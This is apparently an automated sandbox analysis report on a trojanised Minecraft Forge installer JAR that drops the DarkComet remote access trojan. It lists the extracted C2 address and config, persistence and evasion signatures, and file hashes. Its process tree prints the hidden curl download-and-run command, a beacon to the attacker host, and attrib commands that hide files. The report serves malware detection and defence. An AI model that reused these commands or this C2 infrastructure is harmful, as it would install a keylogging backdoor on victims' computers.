Overview

overview

10

Static

static

1

forge-1.20...er.jar

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241211-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    15-12-2024 00:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    forge-1.20.1-47.1.12-installer.jar

  • Size

    5.7MB

  • MD5

    6d0b8a01ecfdf53f577e5c2a1da491ec

  • SHA1

    846e02191e94c181de3b9f28a589860625af3d18

  • SHA256

    18fb6ed230d147195ae6243f309bfa9aa8768e707819ddc362ff83f594f4f20c

  • SHA512

    659940064f9493117aede8ecf8f3dfa2bf847368fa661e08cc27b0c22599ea36d6f0e3597f225a41a02105a03b409b8efd8e675f9468ca117b15a9500c98f3a0

  • SSDEEP

    98304:G7M/HfSDrRAoX4xUi7y0t5w4y2cTt6G8hZbCdm/j02G+uyXYsro0UaGJb:QrHox0az+Ttj8zoQuQUVb

Score
10/10
darkcometgoogledebuggerdiscoveryevasionpersistencerattrojanupx

Malware Config

Extracted

Family

darkcomet

Botnet

GoogleDebugger

C2

147.185.221.24:14161

Mutex

RO_MUTEX-8HU43EZ

Attributes
  • InstallPath

    ChromeCookies\ChromeCookie.exe

  • gencode

    WN0BLB8aPxBw

  • install

    true

  • offline_keylogger

    true

  • persistence

    true

  • reg_key

    GoogleDebugJ

Signatures

  • Darkcomet

    DarkComet is a remote access trojan (RAT) developed by Jean-Pierre Lesueur.

    trojanratdarkcomet
  • Darkcomet family
    darkcomet
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Disables Task Manager via registry modification
    evasion
  • Downloads MZ/PE file
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion
  • cURL User-Agent 2 IoCs

    Uses User-Agent string associated with cURL utility.

Processes

  • C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\forge-1.20.1-47.1.12-installer.jar
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4288
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c "curl https://dontuseme.ct8.pl/test.exe > %localappdata%\test.exe && start %localappdata%\test.exe && timeout 5 && del %localappdata%\test.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3816
      • C:\Windows\system32\curl.exe
        curl https://dontuseme.ct8.pl/test.exe
        3⤵
          PID:2772
        • C:\Users\Admin\AppData\Local\test.exe
          C:\Users\Admin\AppData\Local\test.exe
          3⤵
          • Modifies WinLogon for persistence
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4348
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\test.exe" +s +h
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3756
            • C:\Windows\SysWOW64\attrib.exe
              attrib "C:\Users\Admin\AppData\Local\test.exe" +s +h
              5⤵
              • Sets file to hidden
              • System Location Discovery: System Language Discovery
              • Views/modifies file attributes
              PID:788
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local" +s +h
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2284
            • C:\Windows\SysWOW64\attrib.exe
              attrib "C:\Users\Admin\AppData\Local" +s +h
              5⤵
              • Sets file to hidden
              • System Location Discovery: System Language Discovery
              • Views/modifies file attributes
              PID:3000
          • C:\Users\Admin\AppData\Local\Temp\ChromeCookies\ChromeCookie.exe
            "C:\Users\Admin\AppData\Local\Temp\ChromeCookies\ChromeCookie.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3552
            • C:\Program Files (x86)\Internet Explorer\iexplore.exe
              "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
              5⤵
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3572
              • C:\Windows\SysWOW64\notepad.exe
                notepad
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2780
        • C:\Windows\system32\timeout.exe
          timeout 5
          3⤵
          • Delays execution with timeout.exe
          PID:1968
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c "curl https://dontuseme.ct8.pl/setmsg.php?setMsg=someone+connected+gg"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4452
        • C:\Windows\system32\curl.exe
          curl https://dontuseme.ct8.pl/setmsg.php?setMsg=someone+connected+gg
          3⤵
            PID:2452
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=5328,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=4332 /prefetch:8
        1⤵
          PID:3204
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations=is-enterprise-managed=no --field-trial-handle=3696,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=4164 /prefetch:8
          1⤵
            PID:3088
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=5268,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=1308 /prefetch:8
            1⤵
              PID:2888
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=4212,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=4332 /prefetch:8
              1⤵
                PID:2496
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=5428,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=3964 /prefetch:8
                1⤵
                  PID:2096
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=5408,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=3328 /prefetch:8
                  1⤵
                    PID:2452
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=5292,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=4412 /prefetch:8
                    1⤵
                      PID:1920
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=3144,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=5484 /prefetch:8
                      1⤵
                        PID:2036
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations=is-enterprise-managed=no --field-trial-handle=5476,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=5404 /prefetch:8
                        1⤵
                          PID:3728
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=3004,i,818110668446499479,16931387444156440193,262144 --variations-seed-version --mojo-platform-channel-handle=4280 /prefetch:8
                          1⤵
                            PID:2512

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\test.exe
                            Filesize

                            251KB

                            MD5

                            57bd4f73690590693b5b921f29679410

                            SHA1

                            c2cb47bf602541043589e979f21c3d7c1698e3ac

                            SHA256

                            8a3de78cf177be4c37c1525becf05af336c1dc2a4d181cae79f6903754902efa

                            SHA512

                            00b543644058a93f1c0a13e4d40b1c4e76f9581325f1773d79983761ca6903643e5a44717e7785b27a8fac2a6609c19032e3f412d3339e9cc5dc697791890318

                            Download Submit

                          • memory/2780-23-0x0000000000690000-0x0000000000691000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/3552-22-0x0000000000400000-0x00000000004B7000-memory.dmp

                            Filesize

                            732KB

                            Download

                          • memory/3572-20-0x0000000000400000-0x00000000004B7000-memory.dmp

                            Filesize

                            732KB

                            Download

                          • memory/4288-2-0x000001AC191E0000-0x000001AC19450000-memory.dmp

                            Filesize

                            2.4MB

                            Download

                          • memory/4288-12-0x000001AC17940000-0x000001AC17941000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4288-13-0x000001AC191E0000-0x000001AC19450000-memory.dmp

                            Filesize

                            2.4MB

                            Download

                          • memory/4348-17-0x0000000000400000-0x00000000004B7000-memory.dmp

                            Filesize

                            732KB

                            Download

                          • memory/4348-25-0x0000000000400000-0x00000000004B7000-memory.dmp

                            Filesize

                            732KB

                            Download